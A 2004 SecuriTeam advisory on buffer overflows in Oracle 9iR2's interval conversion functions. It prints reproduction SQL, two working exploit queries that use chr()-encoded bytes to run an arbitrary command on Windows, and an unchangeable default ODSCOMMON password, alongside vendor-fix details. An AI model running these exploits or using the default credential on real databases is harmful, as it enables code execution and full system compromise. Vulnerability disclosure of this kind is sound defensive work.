[NEWS] Oracle Database 9ir2 Interval Conversion Buffer Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 02/26/04

To: list@securiteam.com
Date: 26 Feb 2004 17:59:33 +0200

- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.

- - - - - - - - -

  Oracle Database 9ir2 Interval Conversion Buffer Overflow

SUMMARY

Oracle Database Server is one of the most used database servers in the
world, it was marketed as being unbreakable and many people thinks that is
one of the most secure database server in the market.

Oracle Database Server provides two functions that can be used with PL/SQL
to convert numbers to date/time intervals, these functions have buffer
overflow vulnerabilities.

DETAILS

Vulnerable Systems:
 * Oracle Database version 9ir2 and prior

When any of these conversion functions are called with a long string as a
second parameter a buffer overflow occurs.

To reproduce the overflow execute the next PL/SQL:
SELECT NUMTOYMINTERVAL(1,'longstringhere') from dual;
SELECT NUMTODSINTERVAL(1,'longstringhere') from dual;

Any Oracle Database user can exploit this vulnerability because access to
these functions can't be restricted. Exploitation of this vulnerability
allow an attacker to execute arbitrary code, also it can be exploited to
cause DOS (Denial of service) killing Oracle server process. An attacker
can complete compromise the OS and database if Oracle is running on
Windows platform, because Oracle must run under the local System account
or under an administrative account. If Oracle is running on *nix then only
the database could be compromised because Oracle runs mostly under oracle
user which has restricted permissions.

Important: Exploitation of these vulnerabilities becomes easy if Oracle
Internet Directory has been deployed, because Oracle Internet Directory
creates a database user called ODSCOMMON that has a default password
ODSCOMMON, this password can not be changed, so any attacker can use this
user to connect to database and exploit these vulnerabilities.

Full tests on Oracle database 9ir2 under Microsoft Windows 2000 Server and
Linux confirm these vulnerabilities. Versions running in other OS
platforms are believed to be affected too. Previous Oracle Database Server
versions could be affected by these vulnerabilities.

Exploits:
-- These exploits should work on Windows 2000 Server and Windows XP, not
tested on Windows 2003.
-- Run any command at the end of the string
SELECT
NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' ||
chr(59) || chr(79) || chr(150) || chr(01) || chr(141) || chr(68) ||
chr(36) || chr(18) || chr(80) || chr(255) || chr(21) || chr(52) || chr(35)
|| chr(148) || chr(01) || chr(255) || chr(37) || chr(172) || chr(33) ||
chr(148) || chr(01) || chr(32)||'echo ARE YOU SURE? >c:\Unbreakable.txt')
?FROM DUAL;

SELECT
NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' ||
chr(59) || chr(79) || chr(150) || chr(01) || chr(141) || chr(68) ||
chr(36) || chr(18) || chr(80) || chr(255) || chr(21) || chr(52) || chr(35)
|| chr(148) || chr(01) || chr(255) || chr(37) || chr(172) || chr(33) ||
chr(148) || chr(01) || chr(32) || 'echo ARE YOU SURE?
>c:\Unbreakable.txt') ?

FROM DUAL;

Vendor Fix:
Go to Oracle Metalink site, <http://metalink.oracle.com>
http://metalink.oracle.com.

Vendor Contact:
Oracle was contacted and they released a fix without telling the public
nor Ceaser anything and without issuing an alert.

ADDITIONAL INFORMATION

The information has been provided by <mailto:cesarc56@yahoo.com> Cesar.

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages